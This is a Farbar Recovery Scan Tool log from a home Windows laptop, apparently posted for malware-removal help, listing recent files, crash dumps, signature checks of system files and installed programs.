2014-07-05 13:36 - 2012-04-13 10:51 - 00012824 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster-04-12.xlsx
2014-07-05 13:36 - 2012-01-18 10:06 - 00056344 _____ () C:\Users\Ric\Documents\Knott Template blank Tamarind Grove GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-18 10:03 - 00056856 _____ () C:\Users\Ric\Documents\Knott Template blank trivia3 GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-18 09:58 - 00054040 _____ () C:\Users\Ric\Documents\Knott Template trivia3 GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-17 12:25 - 00033048 _____ () C:\Users\Ric\Documents\Knott amended Ric Trivia sheet for multiple teams.xlsx
2014-07-05 13:36 - 2012-01-17 12:20 - 00031256 _____ () C:\Users\Ric\Documents\Knott amended Ric Trivia sheet.xlsx
2014-07-05 13:36 - 2012-01-16 12:34 - 00014104 _____ () C:\Users\Ric\Documents\Knott Template trivia3 GOOD TO GO.xlsx
2014-07-05 13:36 - 2012-01-16 12:29 - 00013848 _____ () C:\Users\Ric\Documents\Knott Template trivia2.xlsx
2014-07-05 13:36 - 2012-01-16 11:55 - 00012056 _____ () C:\Users\Ric\Documents\Knott Template trivia.xlsx
2014-07-05 13:36 - 2011-08-22 18:43 - 00001304 _____ () C:\Users\Ric\Documents\Karaokesongrequestslip.txt
2014-07-05 13:36 - 2011-03-09 16:47 - 01051928 _____ () C:\Users\Ric\Documents\Karaoke text file.txt
2014-07-05 13:35 - 2014-01-24 11:53 - 51149806 _____ () C:\Users\Ric\Documents\GROWING UP BOOMER final Georgia Club.pptx
2014-07-05 13:35 - 2011-08-18 15:58 - 00001304 _____ () C:\Users\Ric\Documents\Karaoke song request slip.txt
2014-07-05 13:34 - 2014-01-24 12:52 - 51149780 _____ () C:\Users\Ric\Documents\GROWING UP BOOMER final Georgia Club extra.pptx
2014-07-05 13:33 - 2013-08-08 11:06 - 00001560 _____ () C:\Users\Ric\Documents\Game Show 5 Ric 3-2.txt
2014-07-05 13:32 - 2013-03-20 08:02 - 00010520 _____ () C:\Users\Ric\Documents\Disney Family Feud.xlsx
2014-07-05 13:32 - 2013-01-28 13:20 - 03211800 _____ () C:\Users\Ric\Documents\Ethics in Education.ppt
2014-07-05 13:32 - 2012-06-16 18:45 - 00015640 _____ () C:\Users\Ric\Documents\FATHER'SDAYSONGS.xls
2014-07-05 13:32 - 2012-02-16 10:48 - 00154136 _____ () C:\Users\Ric\Documents\Fast Money Round 2.xls
2014-07-05 13:32 - 2012-02-16 10:42 - 00032792 _____ () C:\Users\Ric\Documents\Fast Money Round.xls
2014-07-05 13:29 - 2012-06-11 17:12 - 00023064 _____ () C:\Users\Ric\Documents\CALENDARCLASSICS.xls
2014-07-05 13:29 - 2011-04-27 12:43 - 07028992 _____ () C:\Users\Ric\Documents\Bring a tear to my eye.wmv
2014-07-05 13:29 - 2011-02-26 20:26 - 11796504 _____ () C:\Users\Ric\Documents\capture.avi
2014-07-04 13:32 - 2014-07-04 13:27 - 20787200 _____ () C:\Users\Ric\qdata2010.QDF
2014-07-04 13:32 - 2011-02-28 08:03 - 00000000 ____D () C:\Users\Ric\BACKUP
2014-07-04 13:28 - 2014-07-04 04:19 - 20787200 _____ () C:\Users\Ric\Downloads\qdata2010 (1).qdf
2014-07-04 13:24 - 2014-07-04 04:24 - 00001120 _____ () C:\Users\Ric\Downloads\qdata2010 (1)OFXLOG.DAT
2014-07-04 04:56 - 2013-05-19 16:06 - 00039448 _____ () C:\Users\Ric\Documents\Belize The Top English Speaking Retirement Haven in the Caribbean.txt
2014-07-04 04:33 - 2013-03-21 13:45 - 03414552 _____ () C:\Users\Ric\Documents\ABCs.pps
2014-07-04 04:19 - 2014-07-04 04:19 - 20780389 _____ () C:\Users\Ric\Downloads\qdata2010 (2).qdf
2014-07-02 07:15 - 2014-07-02 07:15 - 00003288 _____ () C:\bootsqm.dat
2014-07-02 02:01 - 2014-06-05 11:17 - 00000000 ____D () C:\Users\Ric\AppData\Local\UQmedia
2014-07-01 22:43 - 2012-01-30 10:19 - 00054296 _____ () C:\Users\Ric\Desktop\Knott excel test.xlsx
2014-07-01 22:20 - 2014-05-15 09:09 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\DropboxMaster
2014-07-01 15:37 - 2013-05-23 17:24 - 00000000 ____D () C:\ProgramData\CanonIJPLM
2014-07-01 15:28 - 2014-06-25 19:23 - 20742144 _____ () C:\Users\Ric\Downloads\qdata2010.qdf
2014-07-01 15:27 - 2014-06-25 19:23 - 00000896 _____ () C:\Users\Ric\Downloads\qdata2010OFXLOG.DAT
2014-06-25 20:50 - 2014-06-25 20:26 - 00000961 ____H () C:\IPH.PH
2014-06-25 20:50 - 2011-02-26 14:14 - 00094197 _____ () C:\install.log
2014-06-25 20:20 - 2014-06-25 20:20 - 00208400 _____ (AOL LLC.) C:\Users\Ric\Downloads\AOLDNLD.exe
2014-06-25 20:13 - 2011-02-26 00:37 - 00002503 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk
2014-06-25 20:02 - 2014-06-25 19:54 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Feeqvena
2014-06-25 19:30 - 2014-06-25 19:29 - 00369792 _____ () C:\Windows\Minidump\062514-34335-01.dmp
2014-06-25 19:22 - 2011-04-27 15:24 - 00463200 _____ () C:\Users\Ric\qdata2010OFXLOG.DAT
2014-06-24 13:11 - 2011-08-28 11:40 - 00003866 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA
2014-06-24 13:11 - 2011-08-28 11:40 - 00003470 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core
2014-06-24 13:10 - 2013-10-06 14:24 - 00003888 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-06-24 13:10 - 2013-10-06 14:24 - 00003636 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-06-23 19:05 - 2014-06-23 19:04 - 00370536 _____ () C:\Windows\Minidump\062314-33337-01.dmp
2014-06-20 21:40 - 2011-02-27 19:48 - 00000000 ____D () C:\ProgramData\Roxio
2014-06-20 21:32 - 2014-06-20 21:32 - 00000000 ____D () C:\Users\Ric\Documents\Roxio Projects
2014-06-19 10:21 - 2014-06-13 11:10 - 00000000 ____D () C:\Users\Ric\AppData\Local\Adobe
2014-06-18 16:45 - 2014-06-18 16:44 - 01051112 _____ () C:\Users\Ric\Documents\Divorce Civi lCover Sheet.zip
2014-06-18 16:32 - 2014-06-18 16:31 - 00378088 _____ () C:\Windows\Minidump\061814-37799-01.dmp
2014-06-18 16:20 - 2014-06-18 16:20 - 00262144 _____ () C:\Windows\Minidump\061814-48672-01.dmp
2014-06-18 09:49 - 2014-06-18 09:49 - 00000000 ____D () C:\ProgramData\Package Cache
2014-06-18 09:48 - 2014-06-18 09:48 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-06-18 09:47 - 2014-06-18 09:47 - 00000000 ____D () C:\AMD
2014-06-18 09:40 - 2014-06-18 09:39 - 00569856 _____ () C:\Windows\Minidump\061814-35069-01.dmp
2014-06-17 16:55 - 2014-06-17 16:54 - 00369840 _____ () C:\Windows\Minidump\061714-74116-01.dmp
2014-06-17 16:43 - 2014-06-17 16:42 - 00369808 _____ () C:\Windows\Minidump\061714-29546-01.dmp
2014-06-16 17:22 - 2011-02-25 21:53 - 00000000 ____D () C:\Users\Ric\AppData\Local\Deployment
2014-06-16 17:09 - 2014-06-16 17:08 - 00275760 _____ () C:\Windows\Minidump\061614-35178-01.dmp
2014-06-16 09:54 - 2014-06-16 09:54 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\WMCore
2014-06-16 09:53 - 2014-06-16 09:53 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\WirelessManager
2014-06-16 09:50 - 2011-05-12 18:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DigiGames
2014-06-16 09:48 - 2011-05-12 18:05 - 00000000 ____D () C:\Trivia Production Suite Data
2014-06-16 09:43 - 2014-06-16 09:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel® Matrix Storage Manager
2014-06-16 09:40 - 2011-02-25 23:22 - 00021886 _____ () C:\Windows\DPINST.LOG
2014-06-16 09:39 - 2014-06-16 09:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Wireless
2014-06-16 09:38 - 2014-06-16 09:38 - 00000000 ____D () C:\Windows\Dell
2014-06-16 09:38 - 2014-06-16 09:38 - 00000000 ____D () C:\Program Files (x86)\QUALCOMM
2014-06-16 09:37 - 2011-02-25 22:58 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-06-16 09:36 - 2014-06-16 09:36 - 00000000 ____D () C:\ProgramData\Novatel Wireless
2014-06-16 09:36 - 2014-06-16 09:24 - 00000000 ____D () C:\Users\Ric\New folder
2014-06-16 09:36 - 2012-01-17 12:24 - 00000000 ____D () C:\Users\Ric\AppData\Local\Downloaded Installations
2014-06-16 09:30 - 2014-06-16 09:30 - 00002310 _____ () C:\Users\Public\Desktop\Dell Mobile Broadband Manager.lnk
2014-06-16 09:21 - 2013-10-06 14:25 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-06-16 09:20 - 2014-06-16 09:18 - 00000000 ____D () C:\Program Files\IDT
2014-06-16 09:18 - 2014-06-16 09:18 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-06-16 09:14 - 2014-06-16 09:09 - 00000000 ____D () C:\temp
2014-06-16 09:12 - 2014-06-16 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-06-16 09:12 - 2014-06-16 09:12 - 00000000 ____D () C:\Program Files\My Dell
2014-06-16 09:12 - 2011-05-25 13:26 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-06-16 09:12 - 2011-02-26 00:09 - 00000000 ____D () C:\ProgramData\PCDr
2014-06-16 09:11 - 2012-08-23 06:39 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Support Center
2014-06-16 09:11 - 2011-02-25 21:58 - 00000000 ____D () C:\ProgramData\Dell
2014-06-16 08:57 - 2014-06-16 08:57 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell

Files to move or delete:
====================
C:\Users\Ric\qdata2010OFXLOG.DAT
C:\Users\Ric\qdata2010_OldSyncLog.dat
C:\Users\Ric\qdata2010_SyncLog.dat

Some content of TEMP:
====================
C:\Users\Ric\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpwjih6l.dll
C:\Users\Ric\AppData\Local\Temp\Quarantine.exe
C:\Users\Ric\AppData\Local\Temp\uninst.dll

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-07-06 10:27

==================== End Of Log ============================

 

 

ADDITION.TXT

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-07-2014 01
Ran by Ric at 2014-07-16 11:10:16
Running from C:\Users\Ric\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

AC3Filter 1.63b (HKLM-x32\...\AC3Filter_is1) (Version: 1.63b - Alexander Vigovsky)
Adobe After Effects CS5 Third Party Content (HKLM-x32\...\{C0AA232E-BD1B-40B5-A176-A2BEB67FFAE1}) (Version: 10 - Adobe Systems Incorporated)
Adobe After Effects CS5 Third Party Royalty Content (HKLM-x32\...\{CD29B5CA-4727-4114-9AD9-25CCCE6E4014}) (Version: 10 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 14.0.0.110 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 14.0.0.110 - Adobe Systems Incorporated) Hidden
Adobe Audition 3.0 (HKLM-x32\...\Adobe Audition 3.0) (Version: 3.0 - Adobe Systems Incorporated)
Adobe Audition 3.0 (x32 Version: 3.0 - Adobe Systems Incorporated) Hidden
Adobe Audition 3.0 Vista Compatibility (HKLM\...\{75d2897c-87aa-4a06-8710-3ebda9f02de0}.sdb) (Version:  - )
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.3.0.800 - Adobe Systems Incorporated)
Adobe Community Help (x32 Version: 3.3.0 - Adobe Systems Incorporated) Hidden
Adobe Creative Suite 5 Master Collection (HKLM-x32\...\{288DB08D-0708-4A94-B055-55B99E39EB62}) (Version: 5.0 - Adobe Systems Incorporated)
Adobe Encore CS5 Third Party Royalty Content (HKLM-x32\...\{0E3C6C75-872D-4B0D-B0B2-31C717250691}) (Version: 5.0.0 - Adobe Systems Incorporated)
Adobe Flash Player 13 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 13.0.0.214 - Adobe Systems Incorporated)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.125 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Media Player (x32 Version: 1.8 - Adobe Systems Incorporated) Hidden
Adobe OnLocation CS5 Royalty Content (HKLM-x32\...\{7816FDDE-40D4-482D-AD7D-97858985DB3E}) (Version: 5.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CS5 Third Party Royalty Content (HKLM-x32\...\{4BD0D94C-C5CA-41CA-879B-928E55ADA18F}) (Version: 5.0.3 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Adobe Soundbooth CS5 Codecs (HKLM-x32\...\{DE5DE662-2ECB-4D93-967B-221FBCC8A736}) (Version: 3.0 - Adobe Systems Incorporated)
Adobe Soundbooth CS5 Royalty Codecs (HKLM-x32\...\{F319804F-E3A4-4C02-8AEC-CB39A4F6447E}) (Version: 3.0 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Amazon MP3 Uploader (HKLM-x32\...\com.amazon.music.uploader) (Version: 1.0.6 - Amazon Services LLC)
Amazon MP3 Uploader (x32 Version: 1.0.6 - Amazon Services LLC) Hidden
Amazon Music (HKCU\...\Amazon Amazon Music) (Version: 3.0.0.564 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AOL Toolbar (HKCU\...\AOL Toolbar) (Version:  - )
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version:  - AOL Inc.)
Apple Application Support (HKLM-x32\...\{D9DAD0FF-495A-472B-9F10-BAE430A26682}) (Version: 3.0.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Panorama Maker 6 (HKLM-x32\...\{DABFD34E-BE68-4BC6-9254-5D7A7FF76B99}) (Version: 6.0.8.85 - ArcSoft)
ATI AVIVO64 Codecs (Version: 10.12.0.00122 - ATI Technologies Inc.) Hidden
Audience Poll Pro (HKLM-x32\...\Audience Poll Pro_is1) (Version:  - )
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version:  - )
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - ‎Canon Inc.‬)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.1.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - ‪Canon Inc.‬)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version:  - )
Canon MG3200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3200_series) (Version: 1.01 - Canon Inc.)
Canon MG3200 series On-screen Manual (HKLM-x32\...\Canon MG3200 series On-screen Manual) (Version: 7.5.0 - Canon Inc.)
Canon MG3200 series User Registration (HKLM-x32\...\Canon MG3200 series User Registration) (Version:  - Canon Inc.‎)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.0.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.0 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.0.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.0.0 - Canon Inc.)
Carbonite (HKLM-x32\...\Carbonite Backup) (Version: 5.3.1 build 2232 (Aug-29-2012) - Carbonite)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2010.0122.858.16002 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Media Center (HKLM-x32\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version:  - )
Catalyst Media Center DVD Authoring Module (HKLM-x32\...\{FC4F90EC-B1DA-11D9-9D77-000129760D75}) (Version:  - )
CCC Help Chinese Standard (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Danish (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Dutch (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help English (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Finnish (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help French (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help German (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Italian (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Japanese (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Korean (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Russian (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Spanish (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Swedish (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
ccc-core-static (x32 Version: 2010.0122.858.16002 - ATI) Hidden
ccc-utility64 (Version: 2010.0122.858.16002 - ATI) Hidden
CenturyLink Toolbar (HKLM-x32\...\centurytoolbar) (Version:  - CenturyLink)
Cisco WebEx Meetings (HKCU\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{2A16B95F-7377-410A-B961-EFD9394E1AF3}) (Version:  - Microsoft)
Dell Driver Download Manager (HKCU\...\f031ef6ac137efc5) (Version: 2.1.0.0 - Dell Inc.)
Dell Mobile Broadband Manager (HKLM-x32\...\{23EEC842-57ED-4055-A056-9D4185DFB1AA}) (Version: 6.1.11.3 - Dell)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.8.1.1 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 15.0.18.0 - Synaptics Incorporated)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Dell Wireless HSPA Mini-Card Drivers (HKLM-x32\...\{9D583F01-A973-4B04-90BD-FB7886779090}) (Version: 6.1.13.8 - Dell)
DING! (HKLM-x32\...\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}) (Version: 1.05.005 - Southwest Airlines)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
Dropbox (HKCU\...\Dropbox) (Version: 2.8.2 - Dropbox, Inc.)
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
Fitbit Connect (HKLM-x32\...\{D3CD091B-296B-48E9-9F0F-E9FE53E02E41}) (Version: 1.0.3.5511 - Fitbit Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 35.0.1916.153 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{C1E3DFE7-4EAD-3E9E-A826-E06055BA5921}) (Version: 5.4.2.18903 - Google)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Google+ Auto Backup (HKCU\...\Google+ Auto Backup) (Version: 1.0.22.105 - Google, Inc.)
iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6267.0 - IDT)
InstallVC90Support (x32 Version: 1.01.0000 - Novatel Wireless) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Intel® Turbo Boost Technology Monitor (HKLM\...\{39F4C6F9-618A-4E5B-8FB2-6BD661174E32}) (Version: 1.0.186.6 - Intel)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Internet TV for Windows Media Center (HKLM-x32\...\{9D318C86-AF4C-409F-A6AC-7183FF4CF424}) (Version: 4.2.2.0 - Microsoft Corporation)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
iTunes (HKLM\...\{5A68A656-979F-4168-8795-E2E368AA4DC2}) (Version: 11.2.2.3 - Apple Inc.)
Java Auto Updater (x32 Version: 2.0.6.1 - Sun Microsystems, Inc.) Hidden
Java™ 6 Update 27 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216027FF}) (Version: 6.0.270 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Live! Cam Avatar Creator (HKLM-x32\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.3009.1 - Creative Technology Ltd)
Logitech SetPoint 6.20 (HKLM\...\sp6) (Version: 6.20.64 - Logitech)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Runtime (English) 2007 (HKLM-x32\...\{90120000-001C-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Access Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 32-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Outlook Hotmail Connector 64-bit (HKLM\...\{95140000-007A-0409-1000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft VC9 runtime libraries (x32 Version: 1.0.0 - AOL Inc.) Hidden
Microsoft VC9 runtime libraries (x32 Version: 2.0.0 - AOL Inc.) Hidden
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
